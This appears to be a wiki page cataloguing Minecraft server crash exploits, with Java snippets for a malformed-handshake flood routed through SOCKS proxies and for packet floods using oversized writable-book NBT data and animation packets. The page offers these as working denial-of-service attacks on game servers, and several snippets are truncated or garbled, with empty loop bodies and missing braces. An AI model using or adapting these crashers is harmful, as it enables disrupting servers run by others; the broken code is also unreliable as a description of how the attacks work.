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This page documents the minecraft exploits.

Handshake Crasher

Sending huge amount of fucked handshake packets causes a big amount of exceptions that can fuck ur server, for best result use fast private socks proxies. (Also there is more types of handshake crashers, but some of them don't need a fucked data)

private static final byte[] fuckedHandshakePacket = {0, 0, 0}; //this is fucked handshake data with 3 length of bytes (this can fuck normal bungeecord and spigot) 
  0 - packet length
  0 - packet id
  0 - packet data

public static void handshakeCrasher(Proxy proxy, String ip, int port, int amount) {
    try (Socket socket = new Socket(proxy)) {
        socket.connect(new InetSocketAddress(ip, port));
        for(int i = 0; i < amount; ++i) {
    }catch (Exception e) {}


Sending a lot of big packets in a short space time causes netty crash.

* @author Yooniks
public static void sendCrash() {
    try {
        final ItemStack itemStack = new ItemStack(Items.writable_book);
        final NBTTagList pages = new NBTTagList();
        final NBTTagString pageContent = new NBTTagString("3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j");

        for (int i = 0; i < 100; i++) {

        final NBTTagCompound compound = new NBTTagCompound();
        compound.setString("title", "Yooniks idiot XD");
        compound.setTag("pages", pages);

        itemStack.setTagInfo("pages", pageContent);

        mc.thePlayer.sendQueue.addToSendQueue(new C08PacketPlayerBlockPlacement(itemStack));
    }catch (final Exception e) {}


Sending a lot of packets in a short space time, causes that netty can't handle it.

* @author Yooniks
public static void sendCrash() {
    try {
        mc.thePlayer.sendQueue.addToSendQueue(new C0APacketAnimation());
    }catch (final Exception e) {}